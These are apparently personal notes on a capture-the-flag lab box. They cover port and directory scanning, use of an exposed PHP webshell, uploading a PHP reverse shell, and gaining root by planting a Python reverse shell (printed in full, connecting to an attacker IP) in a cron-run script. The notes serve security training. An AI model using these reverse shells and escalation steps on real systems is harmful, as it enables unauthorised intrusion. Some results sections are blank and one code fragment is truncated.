1. Nmap

   nmap -sC -sV -oA bashed/nmap/initial x.x.x.x

   • sC: This option enables default scripts, which are part of the Nmap Scripting Engine (NSE). These scripts perform a variety of tasks, like detecting vulnerabilities, checking for misconfigurations, and collecting extra information about services.
   • sV: This enables version detection. Nmap tries to determine the version of the services running on open ports, which can help identify vulnerabilities associated with specific software versions.
   • oA bashed/nmap/initial: This option saves the scan results in all three output formats with the specified filename prefix:
     • initial.nmap: Normal output format.
     • initial.xml: XML format.
     • initial.gnmap: Grepable format, useful for further parsing.

   Results:

   

2. Search Apache/2.4.18 for version detection and exploits.

3. Visit x.x.x.x to see the hosted website.

   • Webpage Loads and shows a landing page
     • It leads to a github with a php script which looks like a webshell
       • We copy paste the code into our notes for future.

4. Gobuster

   gobuster -u [<http://x.x.x.x>](<http://x.x.x.x>) -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

   • u <http://x.x.x.x>: Specifies the URL to scan. Replace x.x.x.x with the actual IP address or domain name of the target website.
   • w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt: Specifies the wordlist to use for brute-forcing directories and file names. In this case, it's using the directory-list-2.3-medium.txt wordlist, which is a popular list from DirBuster and is included with some penetration testing distributions like Kali Linux.

   Results:

   

5. We see /uploads and it looks interesting.

6. We visit /uploads it looks empty.

7. We visit /php

8. We see sendMail.php

   

9. We visit /dev.

   1. We see phpbash.min.php and phpbash.php

      

   2. We click on phpbash.php and we get a shell.

      1. We use LinEnum.sh https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

         1. We host it on a python server.

            python -m SimpleHTTPServer 80

         2. We cd into /dev/shm

            /dev/shm is a temporary filesystem (also known as a tmpfs) that is stored in RAM.

         3. We wget it on the phpshell to use it.

            wget x.x.x.x/LinEnum.sh

         4. We execute LinEnum.sh

            bash LinEnum.sh

         5. We copy all the output of the script to our notes.

            • We see that we can execute all commands as scriptmanager and scriptmanager does not require password for sudo privileges.

              

10. We make the shell persistent in order to use shell as scriptmanager

    1. We setup a listener on our machine.

       nc -lvnp 8081

       • l: Puts Netcat in listen mode, which means it will wait for incoming connections rather than initiating one.
       • v: Enables verbose mode, providing more detailed output about the connection and data transfer, making it easier to debug.
       • n: Tells Netcat to skip DNS lookups on IP addresses, which can speed up the process and improve privacy.
       • p 8081: Specifies the port to listen on, in this case, 8081.

    2. We upload a php reverse shell from our machine to the webshell.

       https://github.com/jbarcia/Web-Shells/blob/master/laudanum/php/php-reverse-shell.php

    3. We edit it to set the listener ip and port.

       $ip = 'x.x.x.x'; // CHANGE THIS $port = xxxx; // CHANGE THIS

    4. We wget it to uploads.

       cd var/www/html/uploads

       wget [<http://x.x.x.x/php-reverse-shell.php>](<http://x.x.x.x/php-reverse-shell.php>) (x.x.x.x attacker ip address)

    5. We open it.

       [http://x.x.x.x](<http://x.x.x.x>)/uploads/php-reverse-shell.php (x.x.x.x machine ip address)

    6. We get a shell back on our listener.

    7. We make it persistent by using:

       1. python -c ‘import pty; pty.spawn(”/bin/bash”)’
          • python -c: Runs a Python command (c) directly from the command line. Here, the command is within single quotes.
          • import pty: Imports Python's pty module, which provides pseudo-terminal utilities. A pseudo-terminal is like an emulated terminal, which makes the shell behave more like a full terminal interface.
          • pty.spawn("/bin/bash"): The pty.spawn() function starts a new process in the pseudo-terminal. In this case, it launches /bin/bash as an interactive shell.
            • This gives you access to features like tab completion, arrow keys, signal handling (like Ctrl + C), and command history, which are often missing in basic shells established via Netcat or other reverse shell methods.
       2. then press Ctrl+Z to background it
       3. stty raw -echo; fg
          • stty: This is a command used to change and print terminal line settings.
          • raw: This option puts the terminal into raw mode, where input characters are sent directly to the program without being processed by the terminal (i.e., no special handling of Ctrl+C, backspace, etc.). This mode helps make the shell behave more like a full terminal interface.
          • echo: This disables input echoing. When you type, characters won’t appear on the screen, which prevents double-echoing (displaying each character twice).
          • ;: The semicolon is a command separator, allowing you to run multiple commands in a single line.
          • fg:
            • fg brings the most recently backgrounded process back to the foreground. This is useful because, after running stty, you might have used Ctrl+Z to suspend the shell temporarily, which sends it to the background.
            • fg resumes that suspended job, putting it back into the foreground where you can interact with it directly.

11. We now do

    1. sudo -u scriptmanager bash

       • This logs us in as scriptmanager who can execute all commands on the system

    2. We ls -la to see a directory owned by scriptmanager

    3. We cd into scripts

    4. We ls -la to find a test.py and test.txt

    5. we open test.py and see it opening the test.txt in write mode and writing testing123 every minute.

    6. we edit test.py and write this reverse shell to it from https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

       import socket,subprocess,os
       s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
       s.connect(("x.x.x.x",xxxx))
       os.dup2(s.fileno(),0)
       os.dup2(s.fileno(),1)
       os.dup2(s.fileno(),2)
       p=subprocess.call(["/bin/sh","-i"])
       

       import socket, subprocess, os
       

       • Imports the necessary libraries:

       s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       
       

       • Creates a TCP socket using the IPv4 addressing scheme.

       s.connect(("x.x.x.x", xxxx))
       

       • Connects to the attacker’s IP address (x.x.x.x) on the specified port (xxxx). Replace x.x.x.x and xxxx with the desired IP address and port of the attacker's listener.

       os.dup2(s.fileno(), 0)
       os.dup2(s.fileno(), 1)
       os.dup2(s.fileno(), 
       

       • Redirects the standard input (0), standard output (1), and standard error (2) file descriptors to the socket.
       • s.fileno() gets the file descriptor associated with the socket s, allowing all input/output to be directed through this network connection.

       p = subprocess.call(["/bin/sh", "-i"])
       

       • Spawns an interactive shell (/bin/sh -i) that is connected to the attacker’s socket, enabling the attacker to send and receive commands as if they had direct terminal access to the target machine.

12. We start a new listener on our machine with above mentioned port using

13. We wait for the test.py to be executed automatically.

14. We get a shell back on our listener and we are root

15. We get root because test.txt is owned by root, meaning root is executing the test.py script using cron.

AI Summary of the notes.